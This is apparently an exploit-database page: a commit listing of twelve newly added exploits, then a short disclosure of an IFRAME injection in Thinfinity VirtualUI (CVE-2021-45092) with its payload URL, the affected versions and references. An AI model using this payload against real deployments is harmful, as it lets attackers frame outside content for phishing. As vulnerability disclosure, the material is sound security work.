8691f166f7
12 changes to exploits/shellcodes HMA VPN 5.3 - Unquoted Service Path Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) Cab Management System 1.0 - 'id' SQLi (Authenticated) Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated) Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated) Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection Thinfinity VirtualUI 2.5.26.2 - Information Disclosure WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated) FileCloud 21.2 - Cross-Site Request Forgery (CSRF) Dbltek GoIP - Local File Inclusion
22 lines
No EOL
1.1 KiB
Text
22 lines
No EOL
1.1 KiB
Text
Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection
|
|
Date: 16/12/2021
|
|
Exploit Author: Daniel Morales
|
|
Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/>
|
|
Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/>
|
|
Version: Thinfinity VirtualUI < v3.0
|
|
Tested on: Microsoft Windows
|
|
CVE: CVE-2021-45092
|
|
|
|
How it works
|
|
By accessing the following payload (URL) an attacker could iframe any external website (of course, only external endpoints that allows being iframed).
|
|
|
|
Payload
|
|
The vulnerable vector is "https://example.com/lab.html?vpath=//wikipedia.com <https://example.com/lab.html?vpath=//wikipedia.com> " where "vpath=//" is the pointer to the external site to be iframed.
|
|
|
|
Vulnerable versions
|
|
It has been tested in VirtualUI version 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0.
|
|
|
|
References
|
|
https://github.com/cybelesoft/virtualui/issues/2 <https://github.com/cybelesoft/virtualui/issues/2>
|
|
https://www.tenable.com/cve/CVE-2021-45092 <https://www.tenable.com/cve/CVE-2021-45092>
|
|
https://twitter.com/danielmofer <https://twitter.com/danielmofer> |